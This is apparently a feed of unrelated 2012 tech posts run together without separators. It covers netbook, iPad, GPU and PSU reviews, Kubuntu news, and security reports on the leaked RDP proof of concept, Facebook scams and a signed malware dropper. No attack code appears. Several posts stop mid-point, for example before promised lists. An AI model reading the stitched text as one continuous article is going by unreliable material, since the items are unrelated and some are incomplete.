We'll have our full review in the future, but in the meantime we thought we'd give some quick impressions of performance and, more importantly, battery life during video playback. I'll cut straight to the chase with regards to CPU performance: it's largely unchanged from the last version, which means Atom N2600 still feels quite sluggish for many tasks. Atom is faster than ARM A9 CPUs, and you can see a comparison of Sunspider 0.9.1 with various tablets below, but for Windows 7 it's still painfully slow at times.
The bigger change however is in the GPU, where the old GMA 3150 (itself a minor tweak to the even older GMA 950) is finally getting a needed upgrade. This won't turn Atom into a gaming system by any stretch of the imagination, but it does finally bring GPU accelerated H.264 decoding into the Atom ecosystem (without the need for a discrete GPU). What does that mean for performance? It means HD YouTube video can finally run without dropping a ton of frames—at least, the 720p videos that I tested played back without any major issues. 1080p video still experiences quite a few dropped frames, unfortunately, but then you don't need to stream 1080p video if you're using the integrated 600p LCD.
But YouTube HD video has always demanded more than local video playback, and we can now finally get DXVA assisted playback of H.264 video content. I tested both 720p and 1080p H.264 videos without any major issues using MPC-HC. What's more, I ran our standard H.264 battery life test to see how the Atom N2800 fared—and I ran it a second time with a 1080p video stream just for good measure. Check out the results:
Atom and netbooks in general still aren't going to set the world on fire with performance, but if there's one thing Atom can do well it's long battery life. Cedar Trail takes the previous Atom results and improves on them by over 50% in video playback tests. Tablets still generally do better here, but gIven that Cedar Trail now supports HDMI output, you could conceivably use an Atom netbook as a portable media player in addition to standard laptop tasks.
I tested Hulu and Netflix on the 1025C as well and both worked reasonably well, but only with SD content. That's not an issue for Hulu, but Netflix HD content completely lost A/V sync. It may be that Hulu and Netflix are not currenlty recognizing the GMA 3600, but until this is addressed it's worth noting.
There's still a question of whether a $300 netbook has a place in the market when we've got tablets to play with, but it's really a matter of intended use as well as price. ASUS' own Eee Prime Transformer offers a better display and a nifty touch interface that easily surpasses the Windows 7 Starter experience, but if you're looking to do mundane tasks like basic word processing you'll need the keyboard attachment, which takes the final price up to ~$550—nearly twice that of the Eee PC 1025C. For basic typing, then, the price of the 1025C makes it a better choice, and you get excellent battery life that will easily carry you through a day of use and then some.
Atom still isn't going to surpass AMD's Brazos for performance or GPU driver quality, but pricing and battery life still appear to be in favor of Intel's Atom, and 10.1" Brazos netbooks are pretty rarefied. We'll have our full review as soon as we can finish running the remaining benchmarks and doing additional testing, which might be a while. Hopefully we'll see equally impressive improvements for Internet and Idle battery life, but it took over ten hours to recharge the battery on the 1025C and eight hours plus for our video playback test, so basically I'm look at a full day for each battery test cycle to complete.
Adobe has released the beta of the CS6 version of Photoshop, the industry standard image editing application. We've been looking at some of its many new features.
Today we are looking at the Gigabyte GA-A55M-S2V, the first A55 motherboard to hit the AnandTech test beds. In comparison to the A75 platform which we have covered extensively, although the A55 lacks a few features such as USB 3.0, SATA 6 Gbps and a second full length PCIe slot, the A55 motherboards are usually aimed at low end, low budget system builders. The Gigabyte GA-A55M-S2V comes in at a smaller than mATX form factor for just such occasions. Please read on for the full review.
The iPad (3) took front row during the recent launch extravaganza, however Apple also refreshed their Apple TV with a new model sporting a single core A5 SoC and some other noteworthy tweaks. We've spent some time with the new model since its launch, and have found a few interesting new things lurking inside. In addition to decoding 1080p iTunes content and Netflix streams, the new Apple TV also includes a second WiFi antenna with better gain, which translates to improved reception and network throughput.
Read on for our quick review.
DRM (Digital Rights Management) is intended to protect media from being played in an unauthorized manner. However, more often than not, it fails to serve the purpose. Today, we will take a detailed look at Cinavia, a DRM mechanism which has recently become mandatory for all Blu-ray players to support.
We will see how Cinavia is different from other Blu-ray DRM mechanisms, and find out whether it will actually help in reducing media piracy. In almost all cases, it is the law-abiding consumer who is put to much inconvenience. Will Cinavia be doing the same? While we are on the subject of Blu-rays, we will also try to identify areas where user-friendliness can be improved and how consumers can get the best possible experience from them. Read on for our opinion piece..
Since I had to announce that Canonical was dropping support for Kubuntu from 12.11 (and then had to announce two days later they were dropping support for 12.04) I've been getting lots of people asking "is this the end of KDE?"
Of course it isn't, KDE is a vibrant community of people making useful and fun software.
Recently Gnome have been noticing they're not winning either. There is a growing realisation that Canonical dropped Gnome some years ago. [This is melodramatic overstatement, there are still a bunch of Gnome programmes used in Ubuntu Desktop but the workspace and webbrowser and e-mail client aren't. Canonical is also using more Qt and less GTK.] Articles like GNOME 3: Why It Failed don't really help the impression.
All this just highlights that we've been making free software for users for over 15 years and still not got out of the geek market. This comment from mpt, canonical designer highlights some reasons why: third party software, marketing to users but importantly to OEMs and their supply chains, online services, an SDK etc.
= So how can KDE remain relevant? =
Better design? This was one of the comments from Ettrich when I first met him at a trade show ages ago. We can call it "usability" but design is a slightly broader term of stepping back and working out why certain tasks are hard to do.
New markets? Aaron and his Make Play Live company is making hardware devices with the Vivaldi tablet, that's exciting. That's a small company. Canonical is a large company and may well do the same, will be interested to see if either work.
Fill in the gaps! There is a common meme that "we've achieved what we wanted 15 years ago", well free software in general has but KDE is really nowhere near a usable desktop. We miss a decent web browser, our office suite is looking promising but still isn't much used, the plasma media centre has never got past an alpha stage, Kontact is losing popularity due to a bumpy transition to Akonadi. There's lots to be working on!
App shop? It's what users expect now. Ubuntu has one from Canonical. Muon in Kubuntu is decent and Plasma Active are working on one but they need to link up to third party suppliers.
Server! We should be welcoming in OwnCloud and Kolab to the KDE community. So far we've failed to do that.
Modularisation. KDE Frameworks 5 is a great project, it might mean developers like Canonical start picking up bits of KDE technology as well as Qt.
Take advantage of Qt project. It's there for the using, has some bumpy areas in the infrastructure (you can't download a patch without a whole clone) and social structures but we can help them.
= And how can Kubuntu remain relevant? =
Kubuntu has the world's largest Linux desktop rollout. I'll say that again. Kubuntu, often mistaken as a mere derivative of Ubuntu, has more spread than any other desktop Linux. Since I had to announce Canonical moving to focus on Unity I've been contacted by plenty of people saying they rely on Kubuntu. Fortunately Kubuntu isn't going anywhere, that's the advantage of Free Software, when you have a cool community (and we have about the most active community of any part of Ubuntu) then it carries on. We may even find new sponsors.
We like to show KDE at its best. We are the only regularly released distro to ship only KDE Software on the desktop(*), others fill it in with GTK tools or their own config tools, we want to be all KDE. [For the benefit of those journalists who don't understand 'regularly' we ship every six months, just like KDE SC]
(*)There is one bug in the above which is shipping LibreOffice, I think the time is right to move to Calligra, they are doing great stuff and need our support to get it to users. They also are reputed to have better MS Office format importers than LibreOffice thanks to the work of KO.
We must remain part of Ubuntu, they are a great community for distros and we couldn't survive without them. Kubuntu is often incorrectly called a "derivative" of Ubuntu but we are part of the Ubuntu family and we are one of their flavours which is just where we should be.
New markets? Kubuntu Active is taking shape. I'd love to have TV friendly media centre support too for example.
But do we need a new name? Kubuntu has never been a great name, it was actually a joke name made up by the original Ubuntu developers for the KDE side. I wonder if a new name would give us a new lease of life like Calligra has. Suggestions welcome :)
We tested the Hive 550W a short while ago, and now Rosewill is following up with their Capstone series, which should be more efficient (80 Plus Gold certification). In this article we will see if the quality of this power supply can match the flawlessness of brands like Seasonic. The Capstone 450W and 650W are little different internally compared to the Hive models. All of the Capstone power supplies are targeted at the high-end market, so our expectations are quite high for this product.
The Capstone series has the goal of delivering performance, quality, and high efficiency; simply put, it's the best solution Rosewill can provide at the moment. The previous tested PSU was made by Sirtec (High Power), but the new models come from a different manufacturer. On the following pages we will show who built these PSUs. Read on to find out how it compares to other offerings.
Just about anyone can put together a solid computer using a decent midtower and the right parts. What we don't see as often is just how fast a computer can be assembled in a small form factor. More and more, too, the term "fast" isn't an all-encompassing one; as the GPU becomes increasingly important, the definition gets foggier and foggier. Today, all of these considerations collide as we test two top end configurations from Puget Systems against each other.
On the outside it looks we have two systems assembled in Antec's ISK-110 enclosure, but on the inside, we have a showdown between Intel and AMD's best and brightest at 65 watts. The more cynical (and admittedly informed) reader may already have an idea of where this is going, but there are definitely some surprises in store. Read on to find out where each platform performs better, as well as our thoughts on the best use case for each system.
I've been playing with getting Kubuntu Active on ARM. Getting a working ARM setup is a lot like getting a working Linux desktop setup when I started in 1999. It's unclear what computer you need, it's unclear what install image you need, it's unclear how you install it and then it doesn't work and it's unclear how you debug it. For some unknown reason Ubuntu Desktop images from precise don't work on my Pandaboard but from oneiric they do. Ubuntu Server from precise seems to work so I've installed that and installed the Kubuntu Active packages on top of it. Maybe soon we'll have working Kubuntu Active images on ARM.
The application in this photo is Muon Installer QML which is a shiny new app installer being written by Aleix Pol and now available from the new Cyberspace PPA which is going to contain daily builds of various KDE projects.
Weel are ye wordy o'a grace, As lang's my ARM.
Hot on the heels of our Retina Display analysis we have some more data for you: battery life of the new iPad. The chart above is our revamped web browser battery life test that we introduced in Part 2 of our Eee Pad Transformer Prime review. Despite the huge increase in battery capacity, battery life seems to be a bit lower than the iPad 2. The drop isn't huge but it does echo what we've seen in our subjective testing: the new iPad doesn't appear to last as long as the old one.
The drop on LTE is in line with what Apple claims you should expect: about an hour less than on WiFi.
Now for the killer. If you have an iPad on Verizon's LTE network and use it as a personal hotspot (not currently possible on the AT&T version), it will last you roughly 25.3 hours on a single charge. Obviously that's with the display turned off, but with a 42.5Wh battery driving Qualcomm's MDM9600 you get tons of life out of the new iPad as a personal hotspot.
More in our upcoming review...
We're hard at work on our review on the new iPad but with a fair bit of display analysis under our belts I thought a quick post might be in order. One of the major features of the new iPad is its 2048 x 1536 Retina Display. Apple kept the dimensions of the display the same as the previous two iPad models, but doubled the horizontal and vertical resolution resulting in a 4x increase in pixels. As display size remained unchanged, pixel density went through the roof:
Read on for our analysis of Apple's Retina Display on the new iPad.
Quick update, to the Archos news we've had rolling lately. US buyers can now pick up the Archos G9 Turbo line of tablets at their promised 1.5 GHz; the US store is now offering the 8" and 10.1" variants for $269 and $329 respectively, with 8GB of NAND on board. These TI OMAP 4460 powered tablets will be our first chance to see what kind of performance can be wrung out of OMAP 4 when pushed to their fastest clock speed. It'll also be curious to see how this new speed affects battery life. The 101 G9 Turbo is also available for $369 with a 250GB HDD, giving you more media storage than you find on some notebooks these days. The specs on this line are impressive when you consider just how much less these tablets are than their competition, many of whom still don't have Android 4.0. We'll have a full review as soon as we can, in the meanwhile prospective buyers should follow the links to the Archos store.
In my previous blogpost about the Duqu Framework, I described one of the biggest remaining mysteries about Duqu - the oddities of the C&C communications module which appears to have been written in a different language than the rest of the Duqu code. As technical experts, we found this question very interesting and puzzling and we wanted to share it with the community.
The feedback we received exceeded our wildest expectations. We got more than 200 comments and 60+ e-mail messages with suggestions about possible languages and frameworks that could have been used for generating the Duqu Framework code. We would like to say a big ‘Thank you!’ to everyone who participated in this quest to help us identify the mysterious code.
Let us review the most popular suggestions we got from you:
Two weeks ago AMD officially unveiled the Radeon HD 7800 series. Composed of the Radeon HD 7870 GHz Edition and Radeon HD 7850, AMD broke from their earlier protocol with the 7700 and 7900 series and unveiled the cards ahead of their actual launch in order to beat CeBIT and GDC. The result was a pair of impressive – if expensive – cards that cemented AMD’s control of the high-end video card market. Unfortunately because of this early unveiling you couldn’t buy one at the time.
Those two weeks have now come and gone, and the 7800 series has finally been released for sale. Because AMD’s partners have largely passed on AMD’s reference design for the 7870 series we wanted to take a look at what the actual retail cards would be like; with almost everyone using a custom cooler and many partners using factory overclocks, there’s a great deal of variation between cards. To that end HIS and PowerColor have sent over their top 7870 cards, the HIS 7870 IceQ Turbo and the PowerColor PCS+ HD7870. How do these retail cards stack up compared to our reference 7870, and what kind of impact do their factory overclocks bring? Let’s find out.
Sweden recently experienced a large banking scam where over 1.2 million Swedish kronor (about $177,800) were stolen by infecting the computers of multiple victims. The attackers used a Trojan which was sent to the victims and, once installed, allowed the attackers to gain access to the infected computers. Luckily these guys were caught and sentenced to time in jail, but it took a while to investigate since over 10 people were involved in this scam.
It's possible that these attacks are no longer as successful as the bad guys would like, because we are now seeing them use other methods to find and exploit new victims. For quite some time now we have seen how hijacked Facebook accounts have been used to lure the friends of whose account has been hijacked to do everything from click on malicious links to transfer money to the cybercriminals’ bank accounts.
Please note that this is not a new scam - it has been out there for quite some time. But what we are now seeing is the use of stolen/hijacked accounts, or fake accounts, becoming very common on Facebook. So common, in fact, that there are companies creating fake accounts and then selling access to them to other cybercriminals. As you might expect, the more friends these accounts have, the more expensive they are, because they can be used to reach more people.
The problem here is not just technical - it’s primarily a social problem. We use Facebook to expand our circle of friends. We can easily have several hundred friends on Facebook, while we in real life we may only have 50. This could be a problem because some of the security and privacy settings in Facebook only apply in your interactions with people who you are not friends with. Your friends, on the other hand, have full access to all the information about you.
I’ve recently posted a video titled “Introduction to the autotools (autoconf, automake, and libtool)”. If you develop software, you might find this video useful. So, here’s a little background on it, for those who are interested.
The “autotools” are a set of programs for software developers that include at least autoconf, automake, and libtool. The autotools make it easier to create or distribute source code that (1) portably and automatically builds, (2) follows common build conventions (such as DESTDIR), and (3) provides automated dependency generation if you’re using C or C++. They’re primarily intended for Unix-like systems, but they can be used to build programs for Microsoft Windows too.
The autotools are not the only way to create source code releases that are easily built and packaged. Common and reasonable alternatives, depending on your circumstances, include Cmake, Apache Ant, and Apache Maven. But the autotools are one of the most widely-used such tools, especially for programs that use C or C++ (though they’re not limited to that). Even if you choose to not use them for projects you control, if you are a software developer, you are likely to encounter the autotools in programs you use or might want to modify.
Years ago, the autotools were hard for developers to use and they had lousy documentation. The autotools have significantly improved over the years. Unfortunately, there’s a lot of really obsolete documentation, along with a lot of obsolete complaints about autotools, and it’s a little hard to get started with them (in part due to all this obsolete documentation).
So, I have created a little video introduction at http://www.dwheeler.com/autotools that I hope will give people a hand. You can also view the video via YouTube (I had to split it into parts) as Introduction to the autotools, part 1, Introduction to the autotools, part 2, and Introduction to the autotools, part 3.
The entire video was created using free/libre / open source software (FLOSS) tools. I am releasing it in the royalty-free webm video format, under the Creative Commons CC-BY-SA license. I am posting it to my personal site using the HTML5 video tag, which should make it easy to use. Firefox and Chrome users can see it immediately; IE9 users can see it once they install a free webm driver. I tried to make sure that the audio was more than loud enough to hear, the terminal text was large enough to read, and that the quality of both is high; a video that cannot be seen or heard is rediculous.
This video tutorial emphasizes how to use the various autotools pieces together, instead of treating them as independent components, since that’s how most people will want to use them. I used a combination of slides (with some animations) and the command line to help make it clear. I even walk through some examples, showing how to do some things step by step (including using git with the autotools). This tutorial gives simple quoting rules that will prevent lots of mistakes, explains how to correctly create the “m4” subdirectory (which is recommended but not fully explained in many places), and discusses why and how to use a non-recursive make. It is merely an introduction, but hopefully it will be enough to help people get started if they want to use the autotools.
Though AMD announced the Radeon HD 7800 series nearly two weeks ago, it won’t be until Monday that the cards officially go on sale. While we’re still at work on our full launch article, our first retail card, PowerColor’s PCS+ HD7870, recently arrived and we’ve just finished putting it through its paces.
The PCS+ HD7870 is fairly typical of what will be launching; it’s a factory overclocked card with a heatpipe based open air cooler. PowerColor has pushed the card to 1100MHz core, 4.9GHz memory, representing a 100MHz (10%) overclock and a much more mild 100MHz (2%) memory overclock. Given the very high overclockability we’ve seen in the entire Radeon HD 7000 series, PowerColor is one of the partners looking to take advantage of that headroom to stand out from the pack.
We’ll have the full details on Monday, but for the time being we wanted to share a couple of numbers.
Compared to the reference 7870 The PCS+ HD7870 is faster and quieter at the same time, the latter of which is largely a result of PowerColor using an open air cooler as opposed to a blower as in AMD’s reference design. The 100MHz overclock adds a fair bit of performance to the PCS+ 7870, and for AMD’s partners this is a big deal as allows them to put more space between their factory overclocked models and stock models as compared to the less overclockable 6000 series.
As far as construction goes the PCS+ 7870 is a rather typical semi-custom 7870. PowerColor is using AMD’s PCB along with their own aluminum heatpipe cooler. As we speculated in our 7870 review, partners are using the second DVI header on the PCB, with PowerColor using a stacked DVI design here to offer a second SL-DVI port.
Finally, how’s overclocking? We hit 1150MHz core on our reference 7870. With PowerColor already binning chips for their PCS+ 7870 we landed a chip that could do a full 1200MHz, a full 20% over the reference 7870 and 9% over PowerColor’s factory overclock. And like the reference 7870 this is all on stock voltage – we haven’t even touched overvolting yet.
But what does 1200MHz do for a 7870? For that you’ll just have to check in on Monday when we look at our full collection of retail Radeon HD 7870 cards.
Rosewill sent us their newest model Hive with 550W. The rated power makes these models good for most common GPUs as well as powerful CPUs. Features such as 80 Plus Bronze certification and modular cables are quite common these days, but such characteristics say little about how good a PSU really is. What about the internal design and components for example? Who built this PSU? On the following pages we will meet an old acquaintance with a new look and see if it's capable of keeping pace with the times.
Apple's A5X SoC
Today has been pretty exciting. Not only did we confirm the die size of Apple's A5X SoC (162.94mm^2) but we also found out that it's still built on Samsung's 45nm LP process. Now, courtesy of UBM TechInsights, we have the first annotated floorplan of the A5X (pictured above).
You can see the two CPU cores (ARM Cortex A9s) as well as the additional two GPU cores (PowerVR SGX543MP4) compared to the A5 (pictured below). Note the increase in DDR interfaces, although it's unclear whether we're looking at 4x16 or 4x32-bit interfaces. It's quite possible that it's the former. Also note that Apple has moved the DDR interfaces next to the GPU cores, compared to the CPU-adjacent design in the A5. It's clear who is the biggest bandwidth consumer in this chip.
Contrary to what we thought yesterday based on visual estimation of the A5X die, Chipworks has (presumably) measured the actual die itself: 162.94mm^2. While the A5 was big, this is absolutely huge for a mobile SoC. The table below puts it in perspective.
CPU Specification Comparison | ||||||||
CPU | Manufacturing Process | Cores | Transistor Count | Die Size | ||||
Apple A5X | 45nm? | 2 | ? | 163mm2 | ||||
Apple A5 | 45nm | 2 | ? | 122mm2 | ||||
Intel Sandy Bridge 4C | 32nm | 4 | 995M | 216mm2 | ||||
Intel Sandy Bridge 2C (GT1) | 32nm | 2 | 504M | 131mm2 | ||||
Intel Sandy Bridge 2C (GT2) | 32nm | 2 | 624M | 149mm2 | ||||
NVIDIA Tegra 3 | 40nm | 4+1 | ? | ~80mm2 | ||||
NVIDIA Tegra 2 | 40nm | 2 | ? | 49mm2 |
The twitter infosec sphere last night and the blogosphere this morning is in a bit of a frenzy about the public leak of a DoS PoC targeting CVE-2012-0002, the RDP pre-auth remote. This vulnerability was highlighted at our previous Securelist post on this month's patch Tuesday "Patch Tuesday March 2012 - Remote Desktop Pre-Auth Ring0 Use-After-Free RCE!". First off, patch now. Now. If you can't, use the mitigation tool that Microsoft is offering - the tradeoff between requiring network authentication and the fairly high risk of RCE in the next couple of weeks is worth it. You can see the list of related links on the side of this page, one was included for MS12-020.
Some interesting additional information has surfaced about the vulnerability, including the fact that the bug was generated in May of 2011 and "reported to Microsoft by ZDI/TippingPoint in August 2011". The researcher, Luigi Ariemma, discusses that this work wasn't disclosed by him (often, he fully discloses his work). After some careful investigation of the poorly coded "rdpclient.exe" posted online in Chinese forums, he found that it was a cheap replica of the unique code he provided to ZDI and in turn, Microsoft, when privately reporting the bug. This is bad. And already, researchers with connections to Metasploit open source exploit dev like Joshua Drake are tightening up the code, developing and sharing improved PoC. As Microsoft pointed out, confidence in the development of a reliable public exploit within 30 days is very high.
Regardless, the implications of a leak in the highly valuable MAPP program could hinder strong and important security efforts that have been built on years of large financial investment, integrity, and maturing operational and development processes. Thoughts and opinions on the leak itself can be found over at Zero Day. At the same time, I think that this event may turn out to be nothing more than a ding in the MAPP program's reputation, but it's important that this one is identified and handled properly. With the expansion of the program, an event like this one is something that certainly should have been planned for.
UPDATE: Early this afternoon over at the MSRC blog, Microsoft acknowledges that the PoC leaked on Chinese forums "appears to match the vulnerability information shared with MAPP partners", note that an RCE exploit is not publicly circulating just yet, advises patching or mitigating with the Fix-It, and initiates investigation into the disclosure.
UK readers have one more thing to lord over their colonial cousins. Starting today, Archos has made available the long promised Archos 80 G9 Turbo in its full 1.5 GHz glory. Positioned as relative bargains in the Android tablet space, the updated slate can be bought from the UK Archos Store for £199.98 or £239.99, in 8 GB and 16 GB models, respectively. The updated line is shipping with Ice Cream Sandwich on board, so no firmware updates when you open the box.
As a refresher, we've been reporting on Archos G9 line for quite a while. Originally announced as the fastest Android tablets in the world, they haven't until now hit their top speeds on all models. With a TI OMAP 4460 tuned to 1.2 GHz, Archos released the first round of Turbo models in late 2011. These tablets matched the Galaxy Nexus in specs, but were still 20% below the promise. With whatever hurdles finally overcome, we're excited to explore the performance of a full speed OMAP 4460, particularly its PowerVR SGX540, which should be clocked at 384 MHz, trumping the GN's 304 MHz. Alas, this release seems to be UK and Europe only. With US pricing expected to hover around $300, we're eagerly awaiting a US release.
In early March, we received a report from an independent researcher on mass infections of computers on a corporate network after users had visited a number of well-known Russian online information resources. The symptoms were the same in each case: the computer sent several network requests to third-party resources, after which, in some cases, several encrypted files appeared on the hard drive.
The infection mechanism used by this malware proved to be very difficult to identify. The websites used to spread the infection are hosted on different platforms and have different architectures. None of our attempts to reproduce the infections were successful. A quick analysis of KSN statistics that might help to identify the connection between compromised resources and the malicious code being distributed did not yield any results, either. However, we did manage to find something that the news sites had in common.
While Google is obviously trying to create a safer environment in regard to the Android operating system, some of these changes are leaving me a bit confused. I recently discovered some interesting behavior in regard to the default email client in 4.0 Ice Cream Sandwich.
It seems that if you try to download or open a zip file attachment from within the email client, Google warns of the possibility of malware:
The long road to Android 4.0 for US subscribers seems to be getting shorter; and for some lucky users the time has come. AT&T's HTC Vivid was one of their first LTE devices, and made the list of HTC devices that would be receiving Ice Cream Sandwich. Typically these OTA updates are pushed after extensive testing and to a handful of devices at first. However, as first reported on Android Central, some owners were able to pull the update by dialing *#*#682#*#*. The update includes HTC's updated Sense 3.6 skin, which seems a little less intrusive than their prior iterations and does open up its Beats Audio feature to third party applications for the first time.
As a Gingerbread device the VIvid's no slouch; featuring Qualcomm's S3 APQ8060 (1.2 GHz dual-core Snapdragon), paired with the MDM9600 for connectivity, and 1GB of RAM, performance was on par with other phones of that generation. With this update we will have our first chance to directly compare performance on ICS between two similar SoCs (TI's OMAP 4xxx and Qualcomm's S3). No doubt a lot of time has been spent by both Qualcomm and HTC in optimizing the build for the hardware, and hopefully that work will be pushed to more AT&T users in the coming weeks.
Interested Vivid owners should try the update code, users on XDA are reporting varying success; if your phone updates, please post performance results as you get them. We'll update the post if we learn more.
Almost 15 years ago I set up my first multiple monitor system, using a 17” and a 15” CRT. At that time it was a very uncommon setup, but now it seems that many people use multiple displays to manage their workspace. No matter how many displays you hook up, there are always some things that benefit from having a single, large, high resolution desktop, such as the spreadsheets that I use for doing display reviews.
27” and 30” displays with 2560 horizontal pixels have been available for a few years now, though the pricing on them has been very high that whole time. Sometimes you can find a display on sale and pick it up for a reasonable price, but typically the cost of entry seems to be right around $1,000 and up. Because of this people are still likely to buy two, or even three, 1920x1200 displays for the same price and run a multi-monitor desktop.
We finally have our first real affordable 27”, high resolution display on the market now, and it comes courtesy of HP. The HP ZR2740w is a 27” IPS panel with 2560x1440 resolution (16:9 aspect ratio) and an LED backlighting system. With a street price that comes in at $700 or below, what has HP done to be able to bring a high resolution display to the masses at a price well below other vendors? Thankfully, they provided me with a unit so I could evaluate it and see.
Over the last few years of smartphone ownership, one of the most satisfying and somewhat surprising uses has been listening to good old fashioned FM radio, streamed through the internet and to my phone. They're not ideal for this, certainly. Phone speakers are tolerable at best for music, and often not loud enough to fill a room. And streaming, especially in WiFi dead spots around your house, can deplete your phone's battery quickly. And yet, dedicated internet radio devices have remained a bit of a niche; and a niche often reserved for those with money to spare. The earliest internet radio device, the Kerbango was a $300 flop, whose legacy (if not looks) and price carry on with Tivoli Audio’s Networks internet radio. And though cheaper devices have rolled out, including Logitech’s Squeezebox, the prospect of buying a device solely dedicated to streaming internet radio limits the appeal to buyers.
Archos, no stranger to undercutting on price and focusing on media playback, introduced their Archos 35 Home Connect last year, to compete in this space by leveraging Android to bring more than just internet radio to your home. Priced at $130, Archos has basically taken 2010-era smartphone internals (TI's OMAP 3630, indeed) and strapped them to a pair of speakers and a 3.5” screen. Does this repurposing of Android make for a compelling buy? Let’s find out.
The design of the Home Connect is simple, if a little bland. The 3.5” screen is centered on the device and flanked by the speakers. The traditional Android controls (back, menu, search and home) are joined by volume controls as soft buttons just below the screen. A VGA front-facing camera sits just above the screen, and around back we find a microSD slot, micro USB port (for power and PC-connection), 3.5 mm headphone jack and a power button. The casing is glossy, grey plastic and though there’s a certain heft to the device, this doesn’t feel like a device that would survive a terribly large fall.
The display uses a TFT panel, which lacks in resolution and image quality. At 480x272, and producing washed out colors and blacks not much darker than the case, you probably won't watch a lot of video on this screen. This, despite Archos typical dedication to including extensive video codec and container support. More frustrating than the display, is the touchscreen layer. I’ve never met a resistive touchscreen I’ve liked, and though this one is no more offensive than any other, it’s still the most frustrating aspect of the Home Connect. Key presses are often missed and swipe gestures are an exercise in frustration. Some hardware buttons could have gone a long way to remedying the problem, particularly if a directional pad were included. Better still, swapping the resistive layer for a capacitive one would be like mana from heaven.
Though they tout the nearly limitless number of internet radio streams available, Archos doesn’t advertise this simply as an internet radio. Leveraging Android as the operating system means that the device is as versatile as the apps you can install (on Android 2.2, at least). Pre-installed apps are mainly media centric, though Tango is included for video calling. Angry Birds is the only truly surprising inclusion; if scrolling on a resistive screen is difficult, gaming is torturous. To download new apps users use a special version of AppsLib, whose catalog is broad, but unimpressive. The top free app is a Google Apps installer that grants the device Market access, a suitable testament for AppsLib’s selection. With Market installed the limiting factor is that resistive screen. Media streaming apps (Netflix, Pandora, etc) work well, though inputting usernames and passwords is challenging. Productivity and messaging apps are made almost unusable by the touchscreen, but then you probably have a phone, tablet or PC nearby for that. There’s just no getting around it, Android notwithstanding, this is a streaming device first and foremost.
The pre-installed internet radio app is one of the best, Tune-In Radio Pro. The parent company RadioTime, first developed an engine for aggregating internet radio streams in 2003 and is put to use in Logitech’s Squeezebox and other streaming devices. The Tune-In Radio app was introduced in 2008, and after a few years has matured into a feature rich, stable service with apps on iOS, Android, BlackBerry and Windows Phone devices. The “Pro” edition of the app caches content allowing users to pause and time shift streams. It’s not quite Tivo-esque since there’s no facility for scheduling recordings, but a nifty feature for live content, or playing back a song. Users can easily search for streams based on genre, location or name. Station and track data is updated on screen, on streams where it’s available, and the interface is easy to use, if a little drab.
So, we’ve settled on this as a media playback device, how’s it do? Tivoli’s speakers are all high-end components designed to match their top dollar price. These . . . are not. That’s not to say they’re without merit. Indeed, if you’re used to listening to music through your phone’s speaker, this is much better. Stereo separation isn’t huge, but volume is much better and the range is sufficient for internet audio streams. As a frequent NPR listener the speakers seem perfect for the spoken voice, with a broad resonance that gives voices a fullness that a small phone speaker fails to do. Music doesn’t have the impact that a set of larger speakers and separate sub woofer would, but there’s much more bass available than on your phone. Sound is mostly distortion free as you raise the volume, though I suspect the speakers could be driven louder and Archos simply set 100% to be well within the speakers capabilities. Audio then, is great for an Android device, but won’t wow those who’ve bought anything from B&O.
Though typical use case is as a plugged-in device, the home connect does have a battery, so it can be carried around untethered (but within range of your wireless network). Battery life while streaming isn’t quite all-day, figuring closer to four hours than eight, but if you’re around the house you’re probably not too far from a microUSB charger no matter what room you’re in. WiFi range is as good around my house as any other WiFi connected devices, though the thick walls of this old house make horizontal penetration much worse than vertical. Though 802.11 a/b/g/n is offered, users are limited to 2.4 Ghz bands, making it vital to position it farther from your microwave for kitchen use.
With the 35 Home Connect, Archos tries to answer the question, "Is Android a good platform for an internet appliance?" Past internet appliance efforts (the Chumby among them) have found little traction; while streaming audio devices have been hampered by their limited abilities and high cost. While the 35 Home Connect acquits itself well as an audio streamer, it falls short as a broader internet appliance. The display is adequate, and the Android build is stable and effective. But a resistive touchscreen makes the experience less than stellar. Being able to expand services by adding apps (like Spotify) make this device competitive with other devices at the same price point. But there’s just no getting around the fact that Android is a touch interface, and if touch response is lacking, the experience just won’t cut it. That said, I love the idea of the Home Connect and hope Archos (and others) continue to refine the genre. Same device with an OLED screen and capacitive touch, and you have a real winner.
{Ed. note: We've foregone presenting our usual testing data because of the nature of this product. If you're a developer or just curious, feel free to e-mail me at the by-line link and I'd be glad to share.}
iFixit saved us all a whole lot of trouble and performed a teardown of the new iPad announced last week. The internals were mostly what we expected, down to the Qualcomm MDM9600 LTE baseband. Despite many of the new iPad's specs being a known quantity prior to launch, there were a few surprises in the teardown.
The first Ubuntu flavour for tablets is now making daily builds. We even got our first bug reports from our localy Plasma Active upstreams. Images are for i386 only for now, ARMv7 should be added when we know it's a bit more stable and have testers.
The logo above is only an idea, it's the extent of my SVG skills. I also updated the blogs.kde.org poll :)
After a few delays and many recitations of Blizzard's "We'll release it when it's ready" mantra, Diablo III finally has a release date: May 15th. On that date, Blizzard's click-heavy action RPG will be available on PC and Mac for $59.99 USD in almost every region. Latin American and Russian players will need to wait until June 7th.
Digital presales for Diablo III start today, World of Warcraft players interested in picking up a free copy may still do so by purchasing a WoW Annual Pass before May 1st.
For interested parties, Blizzard will also be selling a Diablo III Collector’s Edition for $99.99. The retail exclusive package includes a behind-the-scenes Blu-ray/DVD set, a soundtrack CD, a 208-page art book, and a 4GB USB trinket carrying full versions of Diablo II and Diablo II: Lord of Destruction. It will also come with exclusive content for Diablo III, World of Warcraft, and Starcraft II: Wings of Liberty – most likely in-game items along the lines of a WoW minipet.
The press release touts Diablo III’s real money auction house and robust Battle.net-based matchmaking, yet it makes no mention of the planned player-versus-player arena. This is likely because Diablo III will be launching without it. “The PvP game and systems aren’t yet living up to our standards,” Blizzard’s Jay Wilson wrote on Battle.net last week. “After a lot of consideration and discussion, we ultimately felt that delaying the whole game purely for PvP would just be punishing to everyone who’s waiting to enjoy the campaign and core solo/co-op content.”
Source: Blizzard
Post was updated 19.03.2012 (see below)
In the last few days a malicious program has been discovered with a valid signature. The malware is a 32- or 64-bit dropper that is detected by Kaspersky Lab as Trojan-Dropper.Win32.Mediyes or Trojan-Dropper.Win64.Mediyes respectively.
Numerous dropper files have been identified that were signed on various dates between December 2011 and 7 March 2012. In all those cases a certificate was used that was issued for the Swiss company Conpavi AG. The company is known to work with Swiss government agencies such as municipalities and cantons.
Information about the Trojan-Dropper.Win32.Mediyes digital signature
